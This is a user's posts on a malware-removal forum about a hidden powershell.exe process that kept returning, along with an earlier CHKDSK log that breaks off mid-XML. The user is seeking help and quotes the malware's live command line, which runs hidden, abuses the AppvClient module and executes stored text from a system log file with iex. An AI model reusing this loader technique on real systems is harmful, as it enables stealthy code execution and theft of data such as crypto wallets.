EffWerd

March 26, 2022

Thanks Maurice for your help, legend - got the scorpion off my back.

giphy-downsized.gif.8e85833757475543a4ba8038705ad430.gif

March 26, 2022

Hi Maurice,

ESET log attached. No result.

Let me know if you think there is possibly more to do, much appreciated.

I'll keep an eye on things to see if this rogue process comes back in any case.

Thanks!

eset log.txt

March 26, 2022

Hi Maurice,

Thanks a lot for you help with this.

I ran the MS Safety Scanner which went fine for 3.5 hours then just stalled out on a particular file... sat there for another hour to see if it would pick up again but no luck.

It did create the msert.log but nothing in it of value it seems (attached).

1741206916_MSSafetyScannerStall.png.7d1f8279619bbc9c24ce8ed8424895bf.png

So I went ahead and ran the FRST fix - log is attached.

The powershell.exe process didn't return after reboot, so that's good. Interesting how hidden the whole thing is - I think for sure it was definitely something malicious, I did see it trying to scan for what I assume are crypto wallet folders at one stage in Procmon (I forgot to take a screenshot though...)

Let me know if you think I should try and re-run the MS Safety Scanner tool again - it did count 24 'infected' files before stalling out.

Cheers! Let me know if you have a ko-fi account or something, I'll buy you a coffee or two for your help :)

Fixlog.txt msert.log

March 25, 2022

Hi,

I've got an instance of powershell.exe which keeps coming back and seems to be up to no good.

It's using a bit of system resources and has a bit of a suspect command line attached to it.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=}

Also seems to be pinging a server and also scanning through the file system if I watch it with Procmon.

Can kill the process and it doesn't start back up till windows is restarted. Can't see anything obvious in Autoruns.

Have run windows defender and malwarebytes scans but no result. Have attached FRST results.

Thanks in advance if you can help.

Addition.txt FRST.txt

November 21, 2016

New logs attached.

Thanks for helping out, much appreciated.

Addition.txt

FRST.txt

November 21, 2016

The situation is the same unfortunately.

I was reading another post where you helped someone with the same issue.

You got them to run a fixlist through FRST outside of windows which seemed to resolve it for them.

Composing said fixlist and what exactly you had it do is beyond me.

Can we deconstruct MBAM outside of windows with FRST from the command prompt?

November 20, 2016

Logs as requested:

Log Name: Application
Source: Microsoft-Windows-Wininit
Date: 21/11/2016 3:18:22 AM
Event ID: 1001
Task Category: None
Level: Information
Keywords: Classic
User: N/A
Computer: Kevslaptop
Description:

Checking file system on C:
The type of the file system is NTFS.
Volume label is Windows.

A disk check has been scheduled.
Windows will now check the disk.

Stage 1: Examining basic file system structure ...
492032 file records processed.
File verification completed.
16758 large file records processed.
0 bad file records processed.

Stage 2: Examining file name linkage ...
592928 index entries processed.
Index verification completed.
0 unindexed files scanned.
0 unindexed files recovered to lost and found.

Stage 3: Examining security descriptors ...
Cleaning up 13 unused index entries from index $SII of file 0x9.
Cleaning up 13 unused index entries from index $SDH of file 0x9.
Cleaning up 13 unused security descriptors.
Security descriptor verification completed.
50449 data files processed.
CHKDSK is verifying Usn Journal...
40892616 USN bytes processed.
Usn Journal verification completed.

Stage 4: Looking for bad clusters in user file data ...
492016 files processed.
File data verification completed.

Stage 5: Looking for bad, free clusters ...
94295914 free clusters processed.
Free space verification is complete.
CHKDSK discovered free space marked as allocated in the
master file table (MFT) bitmap.

Windows has made corrections to the file system.
No further action is required.

953325770 KB total disk space.
575342392 KB in 245807 files.
163780 KB in 50450 indexes.
0 KB in bad sectors.
635938 KB in use by the system.
65536 KB occupied by the log file.
377183660 KB available on disk.

4096 bytes in each allocation unit.
238331442 total allocation units on disk.
94295915 allocation units available on disk.

Internal Info:
00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00 ........}+......
31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00 1....{..........

Windows has finished checking your disk.
Please wait while your computer restarts.

Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Wininit" Guid="{206f6dea-d3c5-4d10-bc72-989f03c8b84b}" EventSourceName="Wininit" />
<EventID Qualifiers="16384">1001</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2016-11-20T14:18:22.895205100Z" />
<EventRecordID>5745</EventRecordID>
<Correlation />
<Execution ProcessID="0" ThreadID="0" />
<Channel>Application</Channel>
<Computer>Kevslaptop</Computer>
<Security />
</System>
<EventData>
<Data>